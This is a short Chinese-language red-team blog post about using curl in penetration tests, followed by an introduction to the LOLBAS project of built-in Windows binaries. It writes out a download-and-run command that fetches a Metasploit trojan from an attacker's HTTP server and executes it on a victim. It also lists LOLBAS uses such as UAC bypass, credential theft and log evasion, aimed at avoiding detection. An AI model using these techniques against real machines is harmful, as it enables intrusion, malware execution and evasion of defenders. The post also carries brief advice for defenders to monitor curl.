Curl在滲透測試中的應用
Curl介紹
curl是一個利用URL語法在命令行下工作的文件傳輸工具,1997年首次發行。它支持文件上傳和下載,所以是綜合傳輸工具。
curl可以用於處理遠程服務器上的文件。
例如,我們可以在目標機器上利用curl下載遠程服務器的木馬文件並執行。或者我們可以利用curl將受害機器上的文件傳輸到遠程服務器上。
Test
1、python -m SimpleHTTPServer 8080在kali上開啟web服務
2、生成木馬並開啟msf監聽
3、打開cmd
利用命令curl -O http://192.168.234.151:8080/test.exe & start test.exe
將木馬文件下載到受害機器並運行。
![紅隊技巧:Curl在滲透測試中的應用](http://p2.ttnews.xyz/loading.gif)
![紅隊技巧:Curl在滲透測試中的應用](http://p2.ttnews.xyz/loading.gif)
這裡看到木馬文件成功下載並上線。
在網絡攻防中,針對curl,藍隊應通過規則加大對curl的監控,如果沒用特別的需求,可對其按照策略進行阻止。
Why?
那這裡為什麼要說到curl呢?其實像curl這種系統自帶的二進制文件有很多,可以執行很多種系統的命令。例如下載、執行、編譯、bypassuac等等,在github上有一個很不錯的項目——LOLBAS。在這個項目中,包含了類似curl的二進制文件以及腳本。
該項目旨在“The goal of the LOLBAS project is to document every binary,>
依靠土地技術生存應該更好的理解為,運用系統自帶的二進制文件進行滲透測試,以達到降低被安全廠商檢測的目的。倘若我們在實際滲透的過程中,使用的都是自己的編寫的”十分強大便捷”的工具,那麼極有可能會被受害者發現。
被選入LOLBAS項目的文件或腳本必須滿足以下三個條件:
- 是Microsoft簽名的文件,可以是操作系統本身的文件,也可以是從Microsoft下載的文件。
- 具有額外的”意外”功能。
- 擁有對APT團隊以及紅隊有用的功能。
可以利用LOLBAS做到如下:
- 執行代碼
- 編譯代碼
- 操作文件
- 持久利用
- UAC bypass
- 憑證盜竊
- 轉儲過程內存
- 網絡監視
- 日誌逃避/修改
- DLL側載/劫持,而無需在文件系統中的其他位置進行重定位。
閱讀更多 白帽子 的文章